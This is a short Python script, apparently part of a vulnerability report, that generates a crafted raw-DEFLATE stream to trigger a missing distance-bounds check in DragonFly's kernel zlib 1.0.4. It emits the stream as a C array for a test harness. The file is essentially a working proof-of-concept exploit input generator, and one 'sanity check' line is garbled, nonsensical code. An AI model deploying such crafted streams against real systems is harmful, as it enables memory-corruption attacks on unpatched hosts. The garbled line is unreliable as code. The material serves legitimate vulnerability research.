DF-0265 / gen_stream.py
#!/usr/bin/env python3 # gen_stream.py -- how the crafted raw-DEFLATE stream embedded in harness.c # was produced. Run on the host (the DragonFly guest has no python): # # python3 gen_stream.py # # Strategy: compress with a 32KiB encoder window (windowBits=-15) so the # encoder is free to emit distance codes up to 32768. Engineer the input # so the ONLY match available for the second copy of a long pseudo-random # pattern is more than 256 bytes back, forcing the encoder to emit a # distance > 256. The resulting raw stream, fed to a decoder opened with # inflateInit2(-8) (256-byte window), triggers the missing distance-bounds # check in sys/net/zlib.c 1.0.4. import zlib, sys pat = bytes((i * 131 + 17) & 0xff for i in range(258)) # 258-byte unique pattern (max match len) gap = b'\x00' data = pat + gap + pat # 2nd pat: nearest match at distance 259 co = zlib.compressobj(9, zlib.DEFLATED, -15) # raw, 32K window stream = co.compress(data) + co.flush() # sanity: round-trips with a 32K window out = zlib.decompressobj(-15).decompress(stream) + zlib.decompressobj(-15).flush() \ if False else (lambda d: (d.decompress(stream), d.flush()[1] if False else None, __import__('zlib').decompressobj(-15))(zlib.decompressobj(-15))) # simpler sanity: d = zlib.decompressobj(-15); rt = d.decompress(stream) + d.flush() assert rt == data, "round-trip mismatch with encoder window" print("orig_len", len(data)) print("stream_len", len(stream)) print("HEX", stream.hex()) print("C ", "{" + ",".join("0x%02x" % b for b in stream) + "}; // len=%d" % len(stream)) |